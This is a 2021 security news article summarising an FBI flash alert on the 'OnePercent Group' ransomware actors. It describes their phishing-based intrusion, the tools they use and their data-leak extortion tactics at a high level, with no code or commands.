25 August 2021

FBI shares info on “OnePercent Group” ransomware group


FBI shares info on “OnePercent Group” ransomware group

The Federal Bureau of Investigation (FBI) has published a flash alert detailing the activities of a cybercriminal group nicknamed “OnePercent Group” that has been conducting ransomware attacks against US organizations since November last year.

According to the agency, the threat actor hacks into networks using phishing emails delivering the IcedID banking trojan, which, in turn, downloads additional software, including the Cobalt Strike tool to move laterally in the targeted network. Other malware deployed by the hackers include tools like Rclone, AWS S3 cloud, Mimikatz, Powershell, SharpKatz, BetterSafetyKatz, and SharpSploit.

“OnePercent Group actors encrypt the data and exfiltrate it from the victims’ systems. The actors contact the victims via telephone and email, threatening to release the stolen data through The Onion Router (TOR) network and clearnet, unless a ransom is paid in virtual currency. OnePercent Group actors’ extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data,” the flash alert reads.

“Once the ransomware is successfully deployed, the victim will start to receive phone calls through spoofed phone numbers with ransom demands and are provided a ProtonMail email address for further communication. The actors will persistently demand to speak with a victim company’s designated negotiator or otherwise threaten to publish the stolen data. When a victim company does not respond, the actors send subsequent threats to publish the victim company’s stolen data via the same ProtonMail email address.”

The FBI did mention that OnePercent Group threatens to sell the stolen data to the REvil/Sodinokibi ransomware group if the ransom is not paid, but it did not provide any additional information. However, cybersecurity experts believe that the OnePercent Group actor is likely an affiliate of REvil.

The US federal law enforcement agency has also shared indicators of compromise, tactics, techniques, and procedures (TTP), and mitigation measures to help organizations prevent such attacks.

Back to the list

Latest Posts

Windows MSHTML bug used in ransomware attacks, Microsoft says

Windows MSHTML bug used in ransomware attacks, Microsoft says

According to the Windows maker, in the wild exploitation of CVE-2021-40444 began on August 18.
17 September 2021
State-backed hackers actively exploiting recently disclosed Zoho RCE bug

State-backed hackers actively exploiting recently disclosed Zoho RCE bug

The targeted entities include academic institutions, defense contractors, as well as critical infrastructure entities.
17 September 2021
Free REvil/Sodinokibi ransomware universal decryptor released

Free REvil/Sodinokibi ransomware universal decryptor released

The tool works for all REvil victims whose files were encrypted in attacks prior to July 13, 2021.
17 September 2021
Featured vulnerabilities
Multiple vulnerabilities in cflinuxfs3
Medium Patched | 17 Sep, 2021
Information disclosure in cflinuxfs3
Medium Patched | 17 Sep, 2021
Information disclosure in Git
Medium Patched | 17 Sep, 2021
Multiple vulnerabilities in GLPI
Medium Patched | 17 Sep, 2021
Multiple vulnerabilities in cflinuxfs3
Medium Patched | 17 Sep, 2021